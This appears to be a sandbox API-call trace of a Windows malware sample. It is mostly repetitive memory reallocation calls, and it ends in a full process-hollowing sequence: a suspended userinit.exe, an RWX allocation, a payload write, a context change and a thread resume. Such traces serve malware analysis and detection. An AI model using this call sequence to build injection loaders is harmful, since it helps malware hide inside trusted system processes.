[0117.228] GlobalReAlloc (hMem=0x189000c, dwBytes=0x32000, uFlags=0x2) returned 0x189000c
[0117.228] GlobalLock (hMem=0x189000c) returned 0x25b100
[0117.228] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0117.228] GlobalUnlock (hMem=0x189000c) returned 0
[0117.228] GlobalReAlloc (hMem=0x189000c, dwBytes=0x34000, uFlags=0x2) returned 0x189000c
[0117.228] GlobalLock (hMem=0x189000c) returned 0x25b100
[0117.229] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0117.229] GlobalUnlock (hMem=0x189000c) returned 0
[0117.229] GlobalReAlloc (hMem=0x189000c, dwBytes=0x36000, uFlags=0x2) returned 0x189000c
[0117.229] GlobalLock (hMem=0x189000c) returned 0x25b100
[0117.230] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0117.230] GlobalUnlock (hMem=0x189000c) returned 0
[0117.230] GlobalReAlloc (hMem=0x189000c, dwBytes=0x38000, uFlags=0x2) returned 0x189000c
[0117.230] GlobalLock (hMem=0x189000c) returned 0x25b100
[0117.231] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0117.231] GlobalUnlock (hMem=0x189000c) returned 0
[0117.231] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3a000, uFlags=0x2) returned 0x189000c
[0117.231] GlobalLock (hMem=0x189000c) returned 0x25b100
[0117.231] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0117.231] GlobalUnlock (hMem=0x189000c) returned 0
[0117.231] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3c000, uFlags=0x2) returned 0x189000c
[0117.231] GlobalLock (hMem=0x189000c) returned 0x25b100
[0117.232] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0117.232] GlobalUnlock (hMem=0x189000c) returned 0
[0117.232] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3e000, uFlags=0x2) returned 0x189000c
[0117.232] GlobalLock (hMem=0x189000c) returned 0x25b100
[0117.233] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0117.233] GlobalUnlock (hMem=0x189000c) returned 0
[0117.233] GlobalReAlloc (hMem=0x189000c, dwBytes=0x40000, uFlags=0x2) returned 0x189000c
[0117.233] GlobalLock (hMem=0x189000c) returned 0x25b100
[0117.233] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0117.233] GlobalUnlock (hMem=0x189000c) returned 0
[0117.233] GlobalReAlloc (hMem=0x189000c, dwBytes=0x42000, uFlags=0x2) returned 0x189000c
[0117.233] GlobalLock (hMem=0x189000c) returned 0x25b100
[0117.234] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0117.234] GlobalUnlock (hMem=0x189000c) returned 0
[0117.234] GlobalReAlloc (hMem=0x189000c, dwBytes=0x44000, uFlags=0x2) returned 0x189000c
[0117.234] GlobalLock (hMem=0x189000c) returned 0x25b100
[0117.235] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0117.235] GlobalUnlock (hMem=0x189000c) returned 0
[0117.235] GlobalReAlloc (hMem=0x189000c, dwBytes=0x46000, uFlags=0x2) returned 0x189000c
[0117.235] GlobalLock (hMem=0x189000c) returned 0x25b100
[0117.236] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0117.236] GlobalUnlock (hMem=0x189000c) returned 0
[0117.236] GlobalReAlloc (hMem=0x189000c, dwBytes=0x48000, uFlags=0x2) returned 0x189000c
[0117.236] GlobalLock (hMem=0x189000c) returned 0x25b100
[0117.236] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0117.236] GlobalUnlock (hMem=0x189000c) returned 0
[0117.236] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4a000, uFlags=0x2) returned 0x189000c
[0117.236] GlobalLock (hMem=0x189000c) returned 0x25b100
[0117.237] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0117.237] GlobalUnlock (hMem=0x189000c) returned 0
[0117.237] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4c000, uFlags=0x2) returned 0x189000c
[0117.237] GlobalLock (hMem=0x189000c) returned 0x25b100
[0117.238] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0117.238] GlobalUnlock (hMem=0x189000c) returned 0
[0117.238] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4e000, uFlags=0x2) returned 0x189000c
[0117.238] GlobalLock (hMem=0x189000c) returned 0x25b100
[0117.239] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0117.239] GlobalUnlock (hMem=0x189000c) returned 0
[0117.239] GlobalReAlloc (hMem=0x189000c, dwBytes=0x50000, uFlags=0x2) returned 0x189000c
[0117.239] GlobalLock (hMem=0x189000c) returned 0x25b100
[0117.239] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0117.239] GlobalUnlock (hMem=0x189000c) returned 0
[0117.239] GlobalReAlloc (hMem=0x189000c, dwBytes=0x52000, uFlags=0x2) returned 0x189000c
[0117.239] GlobalLock (hMem=0x189000c) returned 0x25b100
[0117.240] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0117.240] GlobalUnlock (hMem=0x189000c) returned 0
[0117.240] GlobalReAlloc (hMem=0x189000c, dwBytes=0x54000, uFlags=0x2) returned 0x189000c
[0117.240] GlobalLock (hMem=0x189000c) returned 0x25b100
[0117.241] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0117.241] GlobalUnlock (hMem=0x189000c) returned 0
[0117.241] GlobalReAlloc (hMem=0x189000c, dwBytes=0x56000, uFlags=0x2) returned 0x189000c
[0117.241] GlobalLock (hMem=0x189000c) returned 0x25b100
[0117.242] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0117.242] GlobalUnlock (hMem=0x189000c) returned 0
[0117.242] GlobalReAlloc (hMem=0x189000c, dwBytes=0x58000, uFlags=0x2) returned 0x189000c
[0117.242] GlobalLock (hMem=0x189000c) returned 0x25b100
[0117.242] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0117.242] GlobalUnlock (hMem=0x189000c) returned 0
[0117.242] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5a000, uFlags=0x2) returned 0x189000c
[0117.242] GlobalLock (hMem=0x189000c) returned 0x25b100
[0117.290] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0117.290] GlobalUnlock (hMem=0x189000c) returned 0
[0117.290] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5c000, uFlags=0x2) returned 0x189000c
[0117.290] GlobalLock (hMem=0x189000c) returned 0x25b100
[0117.291] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0117.291] GlobalUnlock (hMem=0x189000c) returned 0
[0117.291] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5e000, uFlags=0x2) returned 0x189000c
[0117.291] GlobalLock (hMem=0x189000c) returned 0x25b100
[0117.292] CreateProcessA (in: lpApplicationName="C:\\Windows\\System32\\userinit.exe", lpCommandLine="", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1b0c20*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1b0c10 | out: lpCommandLine="", lpProcessInformation=0x1b0c10*(hProcess=0xfc, hThread=0x100, dwProcessId=0xfd0, dwThreadId=0xfd4)) returned 1
[0117.294] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x1000, flProtect=0x4) returned 0x1c0000
[0117.294] GetThreadContext (in: hThread=0x100, lpContext=0x1c0000 | out: lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdf000, Edx=0x0, Ecx=0x0, Eax=0x4b2be9, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x16f868, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0117.336] ReadProcessMemory (in: hProcess=0xfc, lpBaseAddress=0x7ffdf008, lpBuffer=0x1b0c74, nSize=0x4, lpNumberOfBytesRead=0x1b0c7c | out: lpBuffer=0x1b0c74*, lpNumberOfBytesRead=0x1b0c7c*=0x4) returned 1
[0117.337] VirtualAllocEx (hProcess=0xfc, lpAddress=0x400000, dwSize=0x63000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000
[0117.337] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x1a10000
[0117.337] VirtualAlloc (lpAddress=0x1a10000, dwSize=0x2c000, flAllocationType=0x1000, flProtect=0x4) returned 0x1a10000
[0117.338] VirtualAlloc (lpAddress=0x19d8000, dwSize=0x38000, flAllocationType=0x1000, flProtect=0x4) returned 0x19d8000
[0117.344] WriteProcessMemory (in: hProcess=0xfc, lpBaseAddress=0x400000, lpBuffer=0x19d6654*, nSize=0x63000, lpNumberOfBytesWritten=0x1b0c7c | out: lpBuffer=0x19d6654*, lpNumberOfBytesWritten=0x1b0c7c*=0x63000) returned 1
[0117.356] WriteProcessMemory (in: hProcess=0xfc, lpBaseAddress=0x7ffdf008, lpBuffer=0x1b0c78*, nSize=0x4, lpNumberOfBytesWritten=0x1b0c7c | out: lpBuffer=0x1b0c78*, lpNumberOfBytesWritten=0x1b0c7c*=0x4) returned 1
[0117.356] SetThreadContext (hThread=0x100, lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdf000, Edx=0x0, Ecx=0x0, Eax=0x450cb8, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x16f868, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0117.356] ResumeThread (hThread=0x100) returned 0x1
